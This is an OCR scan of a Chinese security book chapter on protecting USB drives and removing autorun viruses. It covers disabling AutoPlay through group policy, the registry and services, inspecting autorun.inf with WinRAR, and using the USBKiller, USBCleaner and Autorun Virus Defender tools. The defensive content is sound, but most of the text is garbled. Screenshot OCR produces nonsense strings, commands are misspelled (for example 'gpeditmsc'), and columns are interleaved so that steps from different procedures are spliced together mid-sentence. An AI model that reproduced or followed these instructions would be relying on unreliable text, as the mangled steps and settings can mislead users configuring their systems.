还 会 在 各 个 磁盘 分 区 中 生成 RavMone.exe. 
log 文件 ， 删 除 之 后 会 再 生 。 


10.2 UU 盘 的 安全 防护 技巧 


为 了 保证 用 户 计算 机 系统 的 良好 运行 ， 
就 对 口 盘 的 安全 采取 一 系列 防御 措施 ， 主 
要 措施 有 关闭 系统 默认 打开 的 “自动 播放 ” 
功能 ， 在 日 常 的 工作 和 学 习 中 养 成 良好 的 
安全 使 用 口 盘 习惯 等 。 


绝招 1: 使 用 组 策略 关闭 “自动 播放 ”功能 品 油 如 
使 用 组 策略 可 以 关闭 U 盘 的 “自动 播 训 要 2 

放 ” 功能， 具体 的 操作 步骤 如 下 。 

[step 图 右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜 

单 中 选择 “运行 ”菜单 命令 ， 如 下 图 所 示 。 


搜索 (S) 


运行 (R) 


L 
关机 或 注销 (U) 


桌面 (D) 


A 
[step 图 打开 “运行 ”对 话 框 ， 在“ 打开” 文 
本 框 中 输入 gpeditmsc， 如 下 图 所 示 。 


杏 运行 x 


坷 Windows 将 根据 你 所 壹 入 的 和 名称， 为 你 打开 框 应 的 程序 、 
文件 夫 、 文 档 或 Internet 资源 。 


打 F(O): [gpeditmsc 


J] 古 


浏览 (8)… 


step 图 在 “组 策略 ”窗口 的 左 窗 格 中 依次 打 
开 “ 计 算 机 配置 ” 一 “管理 模板 ” 一 “ 系 
统 ” 一 “所 有 设置 ”， 在 右 窗 格 的 “设置 > 
列表 框 中 双击 “关闭 自动 播放 ”选项 ， 如 
下 图 所 示 。 


第 10 章 “可 移动 U 盘 的 安全 防护 与 病毒 查 杀 “5 


EE -| | [Sep 国 在 “注册 表 编 辑 器 ” 左 窗 格 中 依次 
”tt | HKEY CURRENT USER/Software/ 
~ Microsoft/Windows/CurrentVersion/Explorer/ 


MountPoints2 分 支 并 右 击 ， 在 弹出 的 快捷 菜 


单 中 选择 “权限 ”菜单 命令 ， 如 下 图 所 示 。 


step 园 在 “关闭 自动 播放 ”对 话 框 中 ， 选 中 
“已 启用 ” 单 选 按钮 ， 单 击 “ 确 定 ” 按 钮 ， 
如 下 图 所 示 。 


| Ra oO x B ribbon 
Reap 
[0m 上 一 人 看。 F—f&aN) 日 seorcpbdom 
由 seaonn 
| Di 和 EBD 吝 HEY CURRENT USER\S hware\ Neros off Wirdom Curent ns 
加 ER 日 


| oem re RE step 图 在 弹出 的 “MountPoints2 的 权限 ” 
| 对 话 框 中 选择 Administrator 用 户 ， 在 


es ee “Administrator 的 权限 ”选项 区 选中 “完全 
eee 用 | 控制 ”与 “ 读 取 ” 右 侧 的 “拒绝 ” 复 选 框 ， 


三 Windows XP $P2 之 二 , 扣 傅 下 本 兴 可 及 下 
na, EF Co RON Se 


单 击 “确定 ”按钮 ， 如 下 图 所 示 。 


Mndom xo Sp2 Toh, ET Ene Zp 
各 W860 半生 USB 太守 旺 到 扩 等) 上 汪 于 局 了 HK 


党 丙 上 抽 其 和 ,出 可 用 CD-ROM 区 可 你 Sr 近世 
he 


De ee alan 
Ei 全 下 忆 芝 后 人 各 天 对 短 上 委 用 抬 愉 . 


加 时 六 用 且 不 近 和 此 壬 共 安 年， 对 用 局 弛 六。 


绝招 2: 通过 注册 表 关 闭 “ 自 动 播放 ”功能 
通过 修改 注册 表 可 以 关闭 “自动 播放 ” 
功能 ， 具 体 的 操作 步骤 如 下 。 


Eo 打开 “运行 ”对 话 框 ， 在 “打开 ” 文 
本 框 中 输入 regedit， 如 下 图 所 示 。 


画 运行 x 


PE/| Windows 将 根据 你 所 输入 的 名 称 ， 为 你 打开 杠 应 的 程序 、 
文件 夹 、 文档 或 Internet 资源 


打开 (O): |regedi ~ 


Ce | i 


站 Mountpointsz2 的 权限 x 
安全 
给 或 用 产 名 (G): 
矶 ALL APPUCATION PACKAGES 
让 RESTRICTED 
中 SYSTEM 
RB Administrator (DESKTOP-JMQAAOB\Administrator) 
让 Administrators (DESKTOP-JMQAAO3VAdministrators) 


添加 (D).… 入 除 (R) 
Administrator 的 权限 (P) 允许 拒绝 
充 全 控制 回 
该 骏 加 


特殊 权限 


有 关 符 萄 权限 或 高 级 设置 ， 请 单 主 * 高 级 


Ce Cw | 


绝招 3: 设置 服务 关闭 “自动 播放 ”功能 


停止 相关 系统 服务 可 以 实现 关闭 “ 自 钊 
动 播放 ”功能 ， 有 具体 的 操作 步骤 如 下 。 
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SEE 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


step 国 选择 “开始 ”一 “控制 面板 ”一 “ 管 
理工 具 ” 一 “服务 ”选项 ， 双 击 Shell 
Hardware Detection 选项 ， 如 下 图 所 示 。 


二 上 口 x 


rm ERA aEM sn 
GIRLUEIOOOD 


本 


shell Mardware Detrction 二 记 


aE 


step 园 弹出 “Shell Hardware Detection 的 属 
性 ”对 话 框 ， 在 “启动 类 型 ”下 拉 列 表 中 
选择 “禁用 ”选项 ， 单 击 “确定 ”按钮 ， 
如 下 图 所 示 。 


hal Herdware Detection Ps 人 (TH x 


轨 归 登录 体 复 。 依 序 关系 


Ba Shewpenecion 
We Shell Hardware Detecior 
fp 全 
司 区 三立 # 的 经 
CNWINDOWSVsyaemazevchosteve -neseves 
PilP， 其 采 
kk 下 GE 
人 Etm Ba < 


此 外 避 坟 同和 6。 你 可 特定 年 省 的 三 多 革 - 


Ce Ce Tew 


侈 提 示 : 在 UU 盘 的 根 目录 下 建立 Autorun. 
inf 目录 ,并 设 其 属性 为 “隐藏 ”和 “只 读 ”， 
可 以 截断 利用 移动 磁盘 自 运行 进行 传播 的 
病毒 (建议 所 有 的 磁盘 根 目录 下 都 建立 此 
目录 )。 


10.3 如 盘 病 毒 的 查 杀 


U 盘 作为 一 种 日 常用 来 存储 文件 的 工 
具 之 一 ， 由 于 其 体积 小 ， 携 带 非常 方便 ， 
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会 用 来 储存 一 些 重要 的 文件 和 资料 ， 同 时 
会 插 在 不 同 的 计算 机 中 ， 不 可 避免 会 感染 
一 些 恶 意 的 病毒 。 如 果品 盘 中 毒 了 的 话 ， 
这 些 病毒 就 会 借助 U 盘 感 染 其 他 计算 机 或 
对 口 盘 文件 进行 修改 ， 给 用 户 带 来 很 大 的 
损失 ， 那 么 怎么 给 U 盘 杀 毒 呢 ? 


绝招 4: 使 用 WinRAR 查 杀 


一 般 的 U 盘 病毒 文件 具有 隐蔽 性 ， 在 
Windows 正常 状态 下 是 无 法 查看 的 。 而 利 
用 WinRAR 则 可 以 查看 隐藏 的 口 盘 病毒 文 
件 ， 具 体 的 操作 步骤 如 下 。 

[ep 加 运行 WinRAR 软件 ， 选 择 路 径 下 拉 菜 
单 中 的 口 盘 位 置 ， 查 看 口 盘 根 目录 中 的 文 
件 ， 如 下 图 所 示 。 


性 -WnRAR (FE 本 地) 0 x 
文 村 (命令 IC) 工具 6) 太夫 (0) 过 大 (N) 半 屿 (H 


久久 时 国 划 检验 时 和 总 


国 VY vema Ky 


FP * 3 人 时 癌 

下 pnhen 文 和 天 2016-12-14 1.. 
由 System vcum- 文人 闪 2016-04-07 1.. 
In 文 4 到 2016-11-25 1.. 
加 钱 个 人 所 得 襄 ， 文 4 关 2016-04-15 1.. 
恒 | 

凤 onico 297,086 国标 2014-10-17 1 
[ 33802 Microsoft power。 2016-08-081. 


刁 CE 过 二 28 闻 节 (1 个 文件 ) 总 计 4 文件 正和 330.915 闻 节 (3 个 文件 ) 


[step 园 在 U 盘 根 目 录 中 查看 是 否 有 autorun. 
inf 文 件 ， 如 果 有 ， 则 右 击 此 文件 ， 在 弹出 
的 快捷 菜单 中 选择 “查看 文件 ”菜单 命令 ， 

如 下 图 所 示 。 


性 所 -WinRAR (下 千本 地 ) - 9 x 
文人 性 (伟人 iC) 工具 G) 家 家 夫 (0) 连 项 (N) 者 助 (H) 


刍 包 昌国 生境 验 轿 


a 
Way 


2016-12-14 1.. 
2016-04-07 1.. 
2016-11-25 1.. 
2016-04-15 1.. 


step 图 在 WinRAR 的 查看 窗口 中 查看 文件 
内 容 ， 如 果 显 示 内 容 中 有 一 行为 open 一 ###- 
exe, 则 可 判定 已 经 感染 病毒 ,关闭 查看 窗口 ， 
如 下 图 所 示 。 


改 吉 看- autoruninf 一 口 x 
文件 (月 ” 编 强 (E) 查看 (V)】 帮助 (H) 


Open=ABC. exe| 
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[sep 国 双击 运行 USBKiller 的 安装 程序 ， 进 
入 安装 向 导 ， 如 下 图 所 示 。 

玩 云 芝 - U 鱼 亲 雪 专家 (USBKilen 二 x 
宗 当 信用 U0 盘 杀毒 专家 (USBKiller) 安 


避 种 * 起 杀毒 专家 (USBEiller) 3.21 单机 版 到 您 


推荐 您 在 继续 安装 前 关闭 所 有 其 它 应 用 程序 。 
单 击 “下 一 步 ” 继续 ， 或 单 击 “ 取 消 ” 退 出 安装 程序 。 


[= [ 记 9 


Windows 文本 


[sep 四 在 WinRAR 窗口 中 右 击 autorun.inf 文 
件 ， 在 弹出 的 快捷 菜单 中 选择 “删除 文件 ” 
菜单 命令 ， 即 可 删除 文件 ， 如 下 图 所 示 。 


国内 -wwR GPa 
ZH we(0 IRG) wii(0) ERN) Wm) 


LETTL EE 


[7 


- oO x 


修复 压 综 文件 (R) AktR | 一 
是 -~e BE 。 EE 


绝招 5: 使 用 USBKiller 查 杀 


USBKiller 是 一 款 专业 预防 及 查 杀 UU 盘 、 

移动 硬盘 病毒 、Auto 病毒 的 工具 。 其 独创 
的 SuperClean 高 效 强力 杀毒 引擎 可 查 杀 最 
新 U 盘 文件 夹 病毒 、autoruninf 病毒、AV 
终结 者 等 上 百 种 顽固 TU 盘 病毒 ， 是 国内 首 
创 的 可 对 计算 机 实行 主动 防御 ， 自 动 检测 
清除 插入 UU 盘 内 的 病毒 ， 杜 绝 病毒 通过 U 
盘 感 染 计算 机 的 专 杀 工 具 。 


1. USBKiller 的 安装 


在 USBKiller 官 方 网 站 http://www.easy- 
softs.com.cn 上 下 载 安装 文件 ， 其 安装 步骤 
如 下 。 


[sep 图 单 去 “下 一 步 ” 按 钮 ， 弹 出 “选择 
目标 位 置 ”窗口 ， 在 其 中 用 户 可 以 指定 
USBKiller 的 安装 目录 ， 如 下 图 所 示 。 

于 去 壬 - 重头 十 专家 (USBkillen) x 


选择 目标 位 置 
您 想 符 入 杀 碍 专家 (USBKiller) 安装 在 什么 地 方 ? 
单 击 “ 下 一 步 ” 继续 。 如 果 您 想 选择 其 它 文件 去 ， 单 击 “ 浏 览 "。 
[Ee le cI) ] | WR) 


支 装 程序 检 安 装 \ 笨 杀毒 专家 (USBKiller) 到 下 列 文件 夹 中 。 


至 少 需要 有 11.3 06 的 可 用 磁盘 空间 。 


5 i 


[es 图 单 直 “下 一 步 ” 按 钮 ， 弹 出 “选择 开 
始 菜单 文件 夹 ”窗口 ， 在 其 中 选择 在 哪里 
放置 程序 的 快捷 方式 ， 如 下 图 所 示 。 

于 二 法 - U 熏 杀 而 专家 (USBKiler) 二 


选择 开始 菜单 文件 志 
您 起 在 哪里 放置 程序 的 快捷 方式 9 


x 


ME (R) 


二 序 贡 在 检 在 下 列 开始 荣 间 文 件 夫 中 创 当 程 序 的 忆捷 方式 。 
单 击 “ 下 一 步 "” 继续。 如 果 您 想 选择 其 它 文件 来, 单 击 “浏览 ”。 
EVE ERI 


5 加 


step 回 单 去 “下 一 步 ” 按 钮 ， 弹 出 “选择 附 
加 任务 ”窗口 ， 在 其 中 选中 “创建 桌面 快 
捷 方 式 ” 复 选 框 ， 如 下 图 所 示 。 
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= 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


更 云 甘 - U 埋 亲 需 专家 (USBKillen Es x 
选择 附加 任务 
您 想 要 安装 程序 执行 哪些 附加 任务 ? < 
因 人 人 忆 杀 毒 专家 (USBKiller) 时 执行 的 附加 任务 , 然 
附加 快捷 方式 
回 人 香 点 面 快捷 方式 (0) 
5 C2 


更 去 法 - U 重 亲 疝 专家 (USBKilen 
喧 杀 专 专 家 《USBKiller) 安装 向 导 完 


0 
单 击 "完成 "退出 家 半 程 序 。 
回 运行 唾 杀 毒 专家 


step 国 单 击 “ 下 一 步 ” 按 钮 , 弹出 “准备 安装 ” 
窗口 ， 在 其 中 显示 了 安装 目录 和 附加 任务 
列表 ， 如 下 图 所 示 。 


更 安装 - U 盘 杀机 专家 (USBKilen) 


x 
准备 安装 

安装 程序 现在 准备 开始 安装 U 盘 杀毒 专家 (USBKiller) 到 您 gj 电脑 中 。 

如 “安装 ”继续 此 安装 程序 。 如 果 您 想 要 回 及 或 改变 设置 ， 请 单 击 “ 上 一 


Ee Files\WSBKiller | 


EB RR 厂商 
step 较 确认 无 误 后 ， 单 击 “ 安 装 ” 按 钮 ， 开 
始 安装 程序 ， 并 显示 安装 的 进度 ， 如 下 图 
所 示 。 


旭 去 美 - U 盘 杀毒 专家 (USBKillen) 


x 
正在 安装 
安装 程序 正在 安装 刚 杀 毒 专家 (USBKi11。r) 到 您 的 电脑 中 ， 请 等 待 。 
正在 解压 


入 文件 
CiVProgran FilesVUSBKillerWwsvep30 dl 


step 葬 安装 完毕 后 ， 就 会 出 现 安装 向 导 完 成 
窗口 ， 单 击 “完成 ”按钮 完成 安装 ， 如 下 
图 所 示 。 
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2. U 盘 病毒 检测 向 导 


在 USBKiller 安装 完成 后 ， 就 会 自动 进 
入 如 盘 病 毒 检测 向 导 窗口 ， 自 动 扫 描 用 户 
计算 机 的 移动 设备 、 内 存 和 硬盘 ， 查 出 可 
疑 病毒 等 ， 具 体 的 操作 步骤 如 下 。 
在 初次 运行 USBKiller 时 ， 将 进行 病 
毒 检测 扫描 ， 如 下 图 所 示 。 


欢迎 使 用 USBKiller 
i 本 向 导 将 会 协助 


1 动 存储 设备 (UV 盘 、 移 动 硬盘 、 开 3 等 ) 
以 检测 并 清除 其 中 的 U 盘 、Autorun 病 毒 木马 
请 点 击 下 一 步 以 继续 


还 一 步 >] 退出 向 导 | 


单 击 “ 下 一 步 ” 按 钮 ，USBKiller 自 
动 检测 用 户 计算 机 中 插入 的 移动 设备 。 检 
测 完毕 后 显示 检测 结果 ， 如 下 图 所 示 。 


TO 如 UW 盘 、 移 动 硬盘 、ITE3、 


VSBKiller 将 会 自动 检测 并 清除 其 中 的 病毒 木马 
接 入 后 请 留意 屏幕 右 下 角 的 检测 提示 - 


4 和 
第 ep 


A 


< 上 一 步 


| | 下- 步 > | | 退出 和 9 导 | 


step 图 单 去 “下 一 步 ” 按 钮 ，USBKiller 自 
动 扫 描 用 户 计算 机 的 内 存 和 硬盘 ， 实 时 显 
示 状 态 ， 如 下 图 所 示 。 


检测 内 存 及 硬盘 是 否 感染 病毒 , 约 在 3 分 钟 内 完成 


正在 检测 : 
K:\photoshop\photoshop_Cs2\hep 


正在 扫 横 硬盘 文件 ,尚未 发 现 病毒 


Lt Eastas | 


扫描 完成 后 ， 将 会 显示 扫描 结果 。 单 
“完成 ”按钮 完成 检测 向 导 ， 如 下 图 所 示 。 


重病 融 性 漠 向 导 


扫描 
检测 内 存 及 硬盘 是 否 感染 病毒 约 在 3 分 钟 内 完成 
扫 据 完 毕 

状态 
扫 所 完成 , 没有 发 现 感 染病 毒 ,请 点 击 完成 按 沁 


< 上 - 步 | | 堪 所 ERE 


3. USBKiller 功 能 介绍 


USBKiller 除了 UU 盘 病 毒 扫描 功能 外 ， 
还 具有 检测 进程 管理 、 自 动 建立 免疫 目录 、 
解锁 U 盘 等 安全 实用 的 功能 ， 其 使 用 界面 
简单 ， 功 能 更 完善 。 
[ep 加 双击 桌面 上 的 USBKiller 快捷 图 标 ， 
打开 USBKiller 工作 界面 ， 单 击 “ 免 疫 吕 
盘 病 毒 ” 按 钮 ， 在 右 侧 的 窗 格 中 选中 “ 禁 
止 自 动 运行 功能 ” 复 选 框 ， 然 后 选中 “ 移 
动 存储 ” 单 选 按钮 ， 单 击 “ 开 始 免疫 ”按钮 ， 
则 会 在 用 户 的 移动 存储 设备 中 建立 免疫 目 
录 ， 如 下 图 所 示 。 


第 10 章 ”可 移动 U 盘 的 安全 防护 与 病毒 查 杀 二 


step 图 单 击 “扫描 病毒 ”按钮 ， 在 右 侧 选 择 
要 扫描 的 对 象 ， 包 括 内 存 、 本 地 硬盘 与 移 
动 存储 3 个 选项 ， 如 下 图 所 示 。 


单 击 “开始 扫描 ”按钮 ， 即 可 开始 扫 
描 病毒 ， 扫 描 进度 在 窗口 下 方 显示 。 如 果 
发 现 病毒 ， 软 件 会 自动 进行 清除 操作 ， 如 
下 图 所 示 。 


下 六 择 扫 档 的 对 旬 
回 相 有 问 放 加 4 和信 RE 
EG es typoor a ines en ess ¢ 


Ea ET 3 


[Step 四 单 击 “ 修 复 系 统 ” 按 钮 ， 在 右 侧 的 窗 
格 中 选择 需要 修复 的 项 目 , 单 击 “开始 修复 ” 
按钮 ， 即 可 修复 由 病毒 感染 造成 的 损害 和 
不 正确 的 设置 ， 如 下 图 所 示 。 


SS 


和 二 过 
本 如下 法 条 开 福 环 坟 了 后 
忒 引 页 天 法 观 二 打开 太 入 
YE; 


Step 图 单 去 “U 盘 工具 ”按钮 ， 然 后 再 单 击 
“立即 解锁 ”按钮 ， 可 以 安全 地 退出 被 锁 
定 的 移动 设备 ; 为 防止 使 用 移动 存储 设备 
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黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


盗 取 资料 ， 可 选中 “禁止 向 USB 存储 设备 谱 扫描 、U 盘 病 毒 免疫 、 修 复 显 示 隐 藏 文 
写 入 数据 ” 复 选 框 ， 单 击 “应 用 设置 ”按钮 ， 件 及 系统 文件 、 安 全 外 载 移动 盘 等 功能 ， 
可 以 全 方位 一 体 化 修复 并 查 杀 U 盘 病 毒 。 

使 用 USBCleaner 查 杀 病毒 的 具体 操作 
步骤 如 下 。 


解锁 组 
机 1. 全 面 检测 系统 
人 er rn 
er = [ep 加 下 载 U 盘 专 杀 工 具 ， 其 文件 夹 中 包含 
| sa 的 文件 ， 如 下 图 所 示 。 
eee 3 - 
t€ + 全 usbeleerer50 ， usbdeaner60 va 站 


step 图 单 去“ 进程 管理 ”按钮 ， 可 以 查看 运 omebine 
行 的 所 有 进程 。 选 中 “进程 名 称 ” 复 选 框 ， Ee 
单 击 “ 终 止 进程 ”按钮 ， 可 以 停止 所 选 进程 ， 8 


bE 

has 

man 

ee 
EE ea 一 四 = 
[DR | 让 
Eo step 图 双击 USBCleanerexe 图 标 ， 打 开 “U 
Been 人 盘 病 毒 专 杀 工具 USBCleaner” 对 话 框 ， 如 

下 图 所 示 。 


在 USBKiller 工作 界面 中 单 击 “ 设 置 ” 
按钮 ， 打 开 “ 设 置 ” 对 话 框 ， 在 其 中 可 设 
置 软件 的 基本 属性 及 对 病毒 的 处 理 方式 ， 
如 下 图 所 示 。 


基本 设置 
回 开机 随 Windows 启 动 口 筷 区 托 入 图 标 


回 旺 趟 病毒 外 于 jj 活 本 口 要旨 台 个 USB 存 依 设 备 [step 图 单 去 “全 面 检测 ”按钮 ， 即 可 对 系统 
HI 理 - 一 进行 扫描 ， 如 下 图 所 示 。 


口 仅 清除 USB 存 情 设备 内 的 病毒 〇 人 安全 打开 USB 存 铺设 备 
日 清除 病毒 并 安全 打开 USB 存 情 设备 


绝招 6: 使 用 USBCleaner 查 杀 


. USBCleaner 是 一 款 绿色 的 辅助 杀毒 工 
具 ， 具 有 检测 查 杀 U 盘 病毒 、U 盘 病毒 广 
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step 贺 在 扫描 的 过 程 中 ， 如 果 发 现 病毒 ， 则 
会 在 下 面 的 列表 中 显示 ， 包 括 病毒 的 名 称 、 
文件 路 径 和 处 理 状态 ， 如 下 图 所 示 。 


山 加 二 南 专 杀 工具 USBCleanerV6.0 


Er BA 


2. 检测 移动 盘 

具体 的 操作 步骤 如 下 。 
[step 图 单 去 “检测 移动 盘 ” 按 钮 ， 打 开 “ 移 
动 存储 病毒 处 理 模块 V1.1” 对 话 框 ， 如 下 
图 所 示 。 


| me | [| 


单 击 “ 检 测 口 盘 ” 按 钮 打开 “ 千 万 
不 可 直接 插 拔 USB 盘 ” 信 息 提 示 框 ， 如 下 
图 所 示 。 


lewwlixb x 


在 程序 失 反 过程 中 请 勿 进行 基 他 捷 作 ， ne 请 用 
人 沉 馈 吉 结 束 本 程序 进 得 ， 千 万 不 可 直接 播 疲 USB 


本 二 到 | 


step 图 单 击 “ 确 定 ” 按 钮 , 打开 “已 发 现 口 盘 ” 
信息 提示 框 ， 如 下 图 所 示 。 
满 重 x 


@ ss 


第 10 章 “可 移动 U 盘 的 安全 防护 与 病毒 查 杀 5 


Step 加 单 去 “确定 ”按钮 ， 即 可 对 本 机 中 的 
训 走 进 本 雪 ， 待 检测 完毕 后 ， 弹 出 “已 
完成 检测 ”对 话 框 ， 如 下 图 所 示 。 


GOOD x 


(i) 你 的 移动 设备 | 已 完成 检测 ! 


国 单 击 “确定 ”按钮 ， 打 开 是 否 调 用 
Re 查 杀 可 盘 中 的 文件 夹 图 标 病毒 
提示 框 ， 如 下 图 所 示 。 


lewwlixb 


| 移动 熏 检 测 已 充 成 ! 是 否 调 用 FolderCure 各 杀 U 盘 中 的 文件 交 图 标 病 
得? 


Cw 


[step 园 单 击 “是 ”按钮 ， 打 开 USBCleaner 
中 自 带 的 “文件 夹 图 标 病毒 专 杀 工具 


FolderCure” 对 话 框 ， 检 测 文件 夹 图 标 病毒 ， 
如 下 图 所 示 。 
本 人才 lderCoe 2 i 上 


TE | fH: 半生 无 3 人 1 


EE 
ET 
床 S 和 各 村 


捷 流 历 E 录 。 隐 下 境 近 这 香 扩 内 后卫 文件 才 。 网 折 用 广 谤 析出 
三 证 


0 er 


[es 国 单 直 “开始 扫描 ”按钮 ， 弹 出 “请 先 
择 扫描 对 象 ”信息 提示 框 。 这 里 采用 系统 
默认 设置 ， 即 “执行 全 盘 扫 描 ” 选 项 ， 如 
下 图 所 示 。 


请 选择 扫描 对 象 : 


1 秘 后 没有 选择 格 自 动 执行 全 盘 扫 描 


个 执行 全 熏 扫 描 ( 默认) 个 执行 \ 大 扫描 ”人 广 执行 自 定 路 径 扫 撕 “个 只 恢复 文件 来 


[step 图 选择 完毕 后 ， 即 可 对 系统 中 的 全 盘 进 
行文 件 夹 图 标 病毒 的 扫描 ， 如 下 图 所 示 。 
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SS 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


Es 


忆 广 作 兴 图标 病 索 专 革 工具 FolderCore 


ET Re EN aT 
[step 图 检测 完毕 后 ， 会 在 “移动 存储 病毒 处 
Re 对 话 框 中 看 到 相应 的 操作 日 志 ， 
如 下 图 所 示 。 


移动 存 售 病 考 处 理 模 块 1 .1 


EE 
刁 大 外 训 南 当 意 隐 你 六 件 


MBE 人 。 | | ”这 四 主要 襄 。 | 
强直 阵 立 件 目 季 邓 的 肆 能 诡 性 | 


3. 检测 未 知 病毒 
[step 国 在 USBCleaner 对 话 框 中 单 击 “ 广 谱 
侦 测 ”按钮 ， 即 可 看 到 “不 能 完全 查 杀 未 
知 病毒 ”信息 提示 框 ， 如 下 图 所 示 。 


提示 x 


广 庶 性 测 旺 一 种 高 级 启发 式 吾 毒 ，EE 前 主要 还 要 坦 示 位 有 无 未 各 病 融 ， 
并 不 能 完全 音 亲 未 知 病 毒 ! 


Ex 


四 单 击 “确定 ”按钮 , 即 可 进行 广 谱 侦 测 ， 
测 完毕 后 ， 会 把 本 机 中 的 所 有 的 autorun. 
inf 文件 列 出 来 ， 如 下 图 所 示 。 


再 二 杀 工具 USBCleanerV6. 


RICH want ema 
PY 


i 
3 上 


让 


[step 图 在 “U 盘 病 毒 专 杀 工具 USBCleaner” 
对 话 框 中 选择 “工具 及 插件 ”选项 卡 ， 在 
其 中 可 以 对 可 盘 病 毒 免疫 、 移 动 盘 却 载 、 
USB 设备 痕迹 清理 、 系 统 修复 等 属性 进行 
设置 ， 如 下 图 所 示 。 


U 生 略 豆 专 亲 工 肯 USBCleanerV6.0 


页 过 天 网 和 夭 上 直达 
和 


Wn 


[Step 加 单 去 “USB 设备 痕迹 清理 ”按钮 ， 打 
开 “USB 设备 使 用 记录 清理 ”对 话 框 ， 在 
其 中 显示 了 USB 设置 的 使 用 记录 ， 如 下 图 
所 示 。 


rp i A 

sp 内 jard disk drives) 本 
ED ED 
[Eee 图 单 去 “清理 所 有 记录 ”按钮 ， 即 可 将 
所 有 的 USB 使 用 记录 清除 ， 如 下 图 所 示 。 


lewwlixb x 


0 操作 已 完成 ! 


[ep 图 选择 “后 台 监 控 ” 选 项 卡 ， 在 桌面 上 
的 状态 栏 中 双击 “USBMON 监控 程式 ”图 
标 图 ， 即 可 打开 “USBCleaner 监控 程式 ” 
对 话 框 ， 在 其 中 可 以 对 监控 的 各 个 属性 进 
行 设置 ， 如 下 图 所 示 。 


天 加 所 法 记录 


Er 


USBCleaner 监控 窒 式 


Secure Your Diagital Life 


USBMON V4.0 


前 迷 护 。 芝 要 上 入 已 关闭 日 入 已 关闭 
ECEERREE 人 [HE I 3 


[eM 


[sp 国 单调“ 其 他 功能 ”按钮 ， 在 打开 的 窗 


口中 即 可 对 U 盘 的 写 保护 和 文件 目录 强制 
删除 进行 设置 ， 如 下 图 所 示 。 


USBCleaner 监控 程式 


Secure Your Digital Life 
USBMON V40 


寺前 赣 控 本 赤 :这 站 皖 已 关 团 “日 期 闪失 已 关 国 


3 ee 册 
ee 
当 藤 状 太 :让 开户 


区 7 | 


[SR 
文件 昌 录 村 


EC 


ESRE | 


密 ”Autorun 病毒 防御 者 软件 是 一 款 专门 针 

对 流行 的 UU 盘 病毒 开发 的 查 杀 程 序 ， 能 够 
彻底 清除 病毒 和 木马 的 相关 文件 和 注册 表 
项 ， 不 留 残余 。 使 用 Autorun 病毒 防御 者 查 
杀 TU 盘 病毒 的 具体 操作 步骤 如 下 。 


1. 升级 病毒 库 并 设置 软件 


下 载 并 解压 缩 Autorun 病毒 防御 者 ， 
即 可 在 解压 后 的 文件 夹 中 看 到 包含 的 文件 ， 
如 下 图 所 示 。 


ba 
和 Windows10 cy 
二 于 地 二 盐 (Di 
0 - ne 
人 全 上 和 1 45 风 转 = 


第 10 章 可 移动 U 盘 的 安全 防护 与 病毒 查 杀 二 Se 


step 加 双击 AutoGuarderexe 图 标 ， 弹 出 
AutoGuarder 信息 提示 对 话 框 ， 提 示 用 户 更 
新 病毒 库 ， 如 下 图 所 示 。 


AutoGuarder 


病 委 库 已 经 很 长 时 间 没 有 更 新 了 ， 请 问 是 否 要 立即 更 新 ? 
我 们 温 列 建议 您 先 更 新 至 最 新 的 病毒 库 后 再 查 杀 病毒 ! 


Ce 


step 国 单 击 “是 ”按钮 ， 打 开 LiveUpdate 对 
话 框 ， 并 开始 升级 病毒 库 ， 如 下 图 所 示 。 
最 UveUpdate 515 X 
感谢 使 用 《Autorun 病 毒 防御 者 》 软 件 * 任 软 工作 室 将 章 诚 为 您 服务 ? 
天 旺 有 


更 新 说 明 : 
@ 2016-07-19 


- 才 中 欠 作 7 和 寺 克 更 Bysgiruetp. 


@ 2016-07-08 


re 


请 发 到 virusBrens 
请 到 官方 哗 坛 http://bbs, 


天 4 信息 
正在 连接 更 新 信息 服务 器 
单个 进度 : 
总 体 进 度 : 
版 可 所 有 (Cc) 2006-2010 任 软 工作 室 ， 保 留 所 有 权利 。 


[step 图 在 病毒 库 更 新 完毕 后 ， 将 会 弹出 
“Anutorun 病毒 防御 者 ” 主 窗口 ， 在 左 侧 的 
窗 格 中 列 出 了 该 工具 的 主要 功能 项 ， 如 下 
图 所 示 。 


[了 IT x 


可 以 ceo 
tM ES 


注 w#orun 病毒 


te EC 


E 


[Eee 国 选择 “软件 设置 ”选项 ， 打 开 “ 软 件 
设置 ”界面 ， 在 其 中 可 对 软件 的 常规 选项 、 
手工 查 杀 、 实 时 监控 、 排 除 区 域 等 选项 进 
行 设 置 ， 如 下 图 所 示 。 
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SS 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


ae 一 “| | 区 国电 梢 完毕 后 , 在 Automun 病毒 防御 者 ” 
| 主 窗口 右 侧 将 列 出 扫描 出 来 的 口 盘 病 毒 ， 
a 并 在 下 方 显示 扫描 完毕 的 信息 提示 ， 如 下 
i Emm 示 
| ase 图 所 示 。 
ee Ee 2 
"ey | ss 
tiss | Geen DNaseah 二 
局 HS 5) 局 RE 渔 zzorarn 病 
me ne 
,| nnn ee | se 
5 ee ie a I 
| en a 
过 
| Si Nm ? hn 
本 
四 这 畦 全 比 站 « > » 坟 Ee 
[lstep 图 设置 完毕 后 ， 单 击 “保存 设置 ”按钮 ， ES 
-下 本 
保存 设置 。 aa Me CE ] | so 
全 ao 
2. 查 杀 病毒 一 一 


[step 图 在 “Autorun 病毒 防御 者 ” 主 窗口 中 3. 专 杀 工 具 的 使 用 

选择 “ 查 杀 病 毒 ” 选项， 然后 单 击 “ 选 择 。 = 
把 实 范 围 ” 态 侧 的 下 拉 按 钥 ， 在 弹出 的 下 | 在 An 六 下 防 倍 者” 宇 窗 下 
拉 列 表 中 选择 “本 地 和 移动 磁盘 (完全 )” | 选择 “ 专 杀 工具 ”这 项 ， 打 开 “ 专 杀 工 具 
选项 ， 如 下 图 所 示 。 界面 ， 在 其 中 包含 了 3 个 专 杀 工具 ， 即 文 
件 夹 图 标 类 病毒 专 杀 工 具 、Auto.exe 病毒 专 


杀 工 具 和 meex.exe 病毒 专 杀 工具 ， 如 下 图 
Er 所 示 。 
os: i es Fp 
se 
消 uwzoraan 病 
SS 
i 证 
本 ， Ca 
“We, > 5 
ep 各 到 了 测 甸 平 工 月 ， 贡 竺 halo 条 夯 从 车 产 生 的 生肖 拉 入 关 认 本 多 伯 。 
Ts 
| os | sa ET 和 
